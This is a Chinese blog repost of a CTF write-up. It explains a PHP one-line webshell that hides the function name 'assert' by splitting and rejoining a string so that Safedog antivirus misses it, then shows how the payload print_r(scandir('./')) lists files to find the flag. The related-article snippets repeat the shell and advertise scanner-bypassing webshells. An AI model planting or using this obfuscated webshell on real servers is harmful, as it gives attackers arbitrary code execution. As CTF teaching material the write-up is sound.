过狗一句话

最新推荐文章于 2022-01-15 10:28:41 发布
最新推荐文章于 2022-01-15 10:28:41 发布
阅读量91 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/Jie-Fei/p/9698527.html
版权

题目:

1 <?php 
2 $poc="a#s#s#e#r#t"; #assert
3 $poc_1=explode("#",$poc); #数组
4 $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; #assert
5 $poc_2($_GET['s']) # assert($_GET['s'])
6 ?>

注:assert()函数内如果是字符串,函数将会把它当做PHP代码执行。

       explode()  函数使用一个字符串分割另一个字符串,字符串分割后组成一个数组返回

 

读取到的信息:

如果 ‘ s ’ 为字符串命令,将会被assert()函数执行,通过此段一句话木马可通过assert() 函数可执行任意命令 ‘ s ’

 

通过 ‘ s ’ 输出文件目录:

构造 s =>    s = print_r( scandir( ' ./ ' ) )

注: scandir() 函数 返回一个数组,数组包含指定路径中的文件和目录

        print_r()函数  以易于理解的格式打印变量

 

根据猜测测试:

 

 进一步猜测 flag 在 f14g.txt 中:

 

转载于:https://www.cnblogs.com/Jie-Fei/p/9698527.html

bailuan2242
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2015年最新的过狗一句话大马
12-26
【标题】:“2015年最新的过狗一句话大马”通常是指在2015年流行的、能够绕过安全软件检测的恶意代码,特别是针对防病毒软件("狗"在这里是民间对防病毒软件的俗称)的一句话木马。这类木马以其简洁高效而闻名,能够...
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
bugku 过狗一句话
Superpig的博客
11-12 736
分析 根据提示,分析得关键在于assert(),查资料得assert()用于调试,跟eval()差不多,但是eval()只能执行符合php编码规范的$code_str 解题 构造payload http://123.206.87.240:8010/?s=print_r(scandir(’./’)); 得到目录结构 再访问http://123.206.87.240:8010/fl4g.txt 即...
过狗一句话(bugku)
hhh
10-20 1211
       昨天写了个关于一句话木马的题,今天上午百度了一个上午理解一句话木马,感jio还是有点懵逼,于是想写一下题来理解一下下……不过虽然这道题题目叫过狗一句话,但似乎跟我想象的不大一样emmmmm ----------------------------------------------------------不废话不废话----------------------我是分割线分割线---...
【CTF bugku shell】关于assert()代码执行漏洞利用、目录查询函数scandir()/system()
zw05011的博客
01-15 4119
知识点 assert()代码执行漏洞 目录查询函数scandir()/system() 题目 1.打开场景,啥有没有,常规操作:查看源码,扫路径,抓包也是啥也没有 2.查看作者提示,送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 通过代码审计得到asser
assert()函数
happy_xiahuixiax的博客
06-07 672
assert()函数用法总结 assert宏的原型定义在#include <assert.h> void assert( int expression );// assert的作用是现计算表达式 expression ,如果其值为假(即为0),那么它先向stderr打印//一条出错信息,然后通过调用 abort 来终止程序运行。请看下面的程序清单badptr.c: #include <stdio.
PHP assert 和 eval
Miss Dan的博客
03-14 3173
assert 判断一个表达式是否成立。返回true or false; &lt;?php $s = 123; assert("is_int($s)"); ?&gt; 从这个例子可以看到字符串参数会被执行,这跟eval()类似。 不过eval($code_str)只是执行符合php编码规范的$code_str。 eval():该函数对于在数据库文本字段中供日后计算而进行的代码存储很有用。(在...
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
过狗exp一枚
09-26
过狗百分百,-7是觉多要记住的,到时候填写的时候填-7,-7是口令哦!
最新过安全狗一句话
10-14
综上所述,这段代码旨在通过一系列复杂的操作(包括反射机制和字符串拼接)来绕过安全软件(如“安全狗”),进而执行恶意代码。这种技术手段对于网站的安全防护构成了挑战,也提醒我们在开发和维护Web应用时,需...
C语言:assert宏的用法
weixin_44498318的博客
03-23 2709
assert宏的原型定义在<assert.h>中,其作用是如果它的条件返回错误,则终止程序执行,原型定义: #include <assert.h> void assert(int expression); assert的作用是现计算表达式 expression ,如果其值为假(即为0),那么它先向stderr打印一条出错信息,然后通过调用 abort 来终止程序运行。请看下面的程序清单badptr.c: #include <stdio.h> #include <a
assert()代码执行漏洞
qq_33505576的博客
07-01 3241
<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?> 使用?s=print_r(scandir('./'))进行目录扫描以发现代码的执...
assert()语法讲解
zhengxiuyudawang的专栏
08-26 2939
使用方法: assert (expression). 解释: 断言,当其中包含的表达式判断为假的时候,程序执行中断。 使用规则: 一般用于函数开头用于判断输入参数是否满足某种条件,和函数内部代码通常隔行,这样代码可读性更好。expression中只能包含一个判断条件,否则debug程序在此中断,我们无法判断是哪个条件不满足。assert()只在debug时起作用,release版
浅谈assert的几种用法
ayu的专栏
06-01 2046
用好assert,问题早知道
PHP命令执行
sca7tered的博客
10-02 913
PHP命令执行 主要函数 代码执行函数 ${} php复杂变量 <?php ${phpinfo()}; {KaTeX parse error: Expected 'EOF', got '}' at position 12: {getname()}}̲ => {s1ye} =>echo "s1ye";,可以发现先执行了getname函数并输出了“s1ye”,接着才执行了echo(优先级)。 $str = "{${phpinfo()}}",花括号定义了变量的边界,因此该条语句先执行括号中内容,
assert()函数用法总结
热门推荐
大灰狼的专栏
04-22 2万+
assert宏的原型定义在中,其作用是如果它的条件返回错误,则终止程序执行,原型定义: #include assert.h> void assert( int expression );   assert的作用是现计算表达式 expression ,如果其值为假(即为0),那么它先向stderr打印一条出错信息,然后通过调用 abort 来终止程序运行。 请看下面的程序清单b
assert断言的陷阱
java践行之路的博客
09-09 254
assert关键字用法简单,但是使用assert往往会让你陷入越来越深的陷阱中。应避免使用。笔者经过研究,总结了以下原因:   1、assert关键字需要在运行时候显式开启才能生效,否则你的断言就没有任何意义。而现在主流的Java IDE工具默认都没有开启-ea断言检查功能。这就意味着你如果使用IDE工具编码,调试运行时候会有一定的麻烦。并且,对于Java Web应用,程序代码都是部署在容器...
PHP 选项/信息 函数-assert()
天行健,君子自强不息
08-21 714
assert这个函数在php语言中是用来判断一个表达式是否成立。返回true or false; 例如 $s = 123; assert("is_int($s)"); ?> 从这个例子可以看到字符串参数会被执行,这跟eval()类似。不过eval($code_str)只是执行符合php编码规范的$code_str。assert的 用法却更详细一点。assert_opti
过狗一句话汇总(包含asp+php+aspx+jsp)
最新发布
01-26
过狗一句话汇总,是一个用于表示利用各种网站漏洞在网站上发布恶意代码的黑客行为。这个词通常与ASP、PHP、ASPX、JSP等网站开发语言相关联。黑客们会在网站上植入恶意代码,比如恶意脚本、木马病毒等,以获取用户的个人信息或者实施其他不法行为。这种行为不仅对网站的安全构成威胁,也会给用户带来隐私泄露和财产损失的风险。因此,网站开发者和管理者需要时刻注意网站的安全性,及时发现和修复漏洞,保护用户信息的安全。同时,用户也应该加强自身的网络安全意识,不随意点击不明链接,保护好自己的个人信息,避免成为黑客攻击的目标。只有大家共同努力,才能构建一个更加安全可靠的网络环境。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值